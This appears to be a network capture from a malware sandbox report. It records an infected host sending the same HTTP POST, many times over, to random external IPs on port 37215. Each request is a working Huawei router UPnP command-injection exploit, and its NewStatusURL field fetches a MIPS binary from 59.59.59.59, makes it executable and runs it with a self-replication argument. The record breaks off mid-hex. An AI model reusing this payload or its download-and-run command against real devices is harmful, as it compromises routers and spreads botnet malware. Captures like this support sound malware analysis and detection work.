                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2004192.168.2.1557886197.174.133.20337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.073055029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2005192.168.2.154602224.88.195.9937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.073085070 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2006192.168.2.1557580171.98.181.9337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.073113918 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2007192.168.2.154172441.159.165.13837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.073148966 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2008192.168.2.1560978197.149.86.3237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.050750971 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2009192.168.2.1548414200.79.194.25137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.050784111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2010192.168.2.1553038157.255.41.15637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.050816059 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2011192.168.2.155246641.153.67.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.050839901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2012192.168.2.1550988197.173.172.10937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.050869942 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2013192.168.2.1546248197.18.94.12037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.050898075 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 